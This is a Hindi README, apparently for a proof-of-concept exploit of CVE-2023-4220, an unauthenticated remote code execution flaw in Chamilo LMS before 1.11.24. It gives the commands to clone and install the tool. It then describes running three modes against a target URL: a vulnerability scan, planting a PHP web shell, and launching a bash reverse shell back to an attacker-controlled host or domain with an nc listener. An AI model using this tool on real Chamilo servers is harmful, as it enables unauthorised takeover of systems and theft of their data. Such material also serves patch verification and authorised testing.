
यह एक Python स्क्रिप्ट है जो CVE-2023-4220 में वर्णित Chamilo's LMS सॉफ्टवेयर सुरक्षा दोष का शोषण करने की अनुमति देती है।
यह एक Python स्क्रिप्ट है जो Chamilo's LMS सॉफ़्टवेयर सुरक्षा दोष का शोषण करने की अनुमति देती है जो CVE-2023-4220 में वर्णित है। सिस्टम 1.11.24 से पहले के संस्करणों में संवेदनशील है।
अपनी मशीन पर रिपॉजिटरी को क्लोन करें और pip का उपयोग करके निर्भरताएँ इंस्टॉल करें (virtualenv का उपयोग करके एक वातावरण बनाने की सिफारिश की जाती है ताकि इन इंस्टॉलेशन को वैश्विक इंस्टॉलेशन से अलग किया जा सके)
git clone https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc cd chamilo-lms-unauthenticated-rce-poc pip install -r requirements.txt
स्क्रिप्ट को लक्ष्य URL की आवश्यकता होती है जिसमें Chamilo's का रूट पथ हो (जैसे http://example.com/chamilo, http://example.com या http://chamilo.example.com) और एक क्रिया करने के लिए (तीन उपलब्ध हैं: scan, webshell और revshell)।
यह क्रिया लक्ष्य पर /main/inc/lib/javascript/bigupload/files/ एंडपॉइंट तक पहुँचने का प्रयास करके जाँचेगी कि क्या वह संवेदनशील है।
python3 main.py -u http://example.com/chamilo -a scan
यह क्रिया संवेदनशील एंडपॉइंट पर एक PHP वेबशेल फ़ाइल बनाएगी।
python3 main.py -u http://example.com/chamilo -a webshell
यह क्रिया एक bash रिवर्स शेल फ़ाइल बनाएगी और निष्पादित करेगी। ऐसा करने के लिए, पहले पिछली क्रिया में उपयोग की गई उसी विधि का उपयोग करके एक वेबशेल बनाया जाएगा। उसके बाद, bash फ़ाइल बनाने और निष्पादित करने के लिए कुछ कमांड निष्पादित किए जाएँगे। सुनिश्चित करें कि आप nc या किसी अन्य उपयोगिता के साथ परिभाषित पोर्ट पर सुन रहे हैं ताकि आपको वास्तव में रिवर्स कनेक्शन मिले। साथ ही, होस्ट एक मान्य आंतरिक/सार्वजनिक IPv4 (जैसे 172.17.1.4 या 186.227.4.31) या आपके द्वारा पंजीकृत डोमेन (जैसे evil-vps.domainreg.net) हो सकता है
python3 main.py -u http://example.com/chamilo -a revshell